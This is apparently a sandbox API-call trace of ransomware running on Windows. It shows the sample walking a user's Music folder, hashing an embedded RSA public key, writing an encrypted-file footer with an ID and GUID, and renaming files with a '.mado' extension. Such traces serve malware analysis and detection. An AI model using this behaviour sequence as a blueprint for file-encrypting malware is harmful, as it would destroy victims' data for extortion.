hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80858 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.512] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x82e8, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x82e8, lpOverlapped=0x0) returned 1 [0204.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0204.512] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x82ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.512] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0204.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0204.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0204.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.512] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0204.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0204.512] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.512] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.512] CloseHandle (hObject=0x63c) returned 1 [0204.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0204.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x3b74b68 [0204.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0204.514] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K1B2Jfw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k1b2jfw.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K1B2Jfw.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k1b2jfw.wav.mado")) returned 1 [0204.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.514] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.515] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x131efc30, ftCreationTime.dwHighDateTime=0x1d5d94b, ftLastAccessTime.dwLowDateTime=0xab96cc50, ftLastAccessTime.dwHighDateTime=0x1d5d869, ftLastWriteTime.dwLowDateTime=0xab96cc50, ftLastWriteTime.dwHighDateTime=0x1d5d869, nFileSizeHigh=0x0, nFileSizeLow=0x16d80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MVYeTXd9U88AMVQ.m4a", cAlternateFileName="MVYETX~1.M4A")) returned 1 [0204.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0204.515] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MVYeTXd9U88AMVQ.m4a") returned=".m4a" [0204.515] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\MVYeTXd9U88AMVQ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mvyetxd9u88amvq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.516] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=93568) returned 1 [0204.516] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.518] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x16d5a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.518] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.519] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.520] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x16d80, lpOverlapped=0x0) returned 1 [0204.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.520] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.521] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.521] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.521] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.521] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.521] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.522] GetLastError () returned 0x0 [0204.522] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.522] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.522] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.522] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.522] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16d80) returned 0x3b81690 [0204.522] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b80858 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2c8 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b808a0 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6bb80 [0204.523] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe328 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe310 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68190 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b682a8 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.524] GetCurrentThreadId () returned 0x600 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71c60 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.524] GetCurrentThreadId () returned 0x600 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe340 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68190 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b683c0 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68078 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 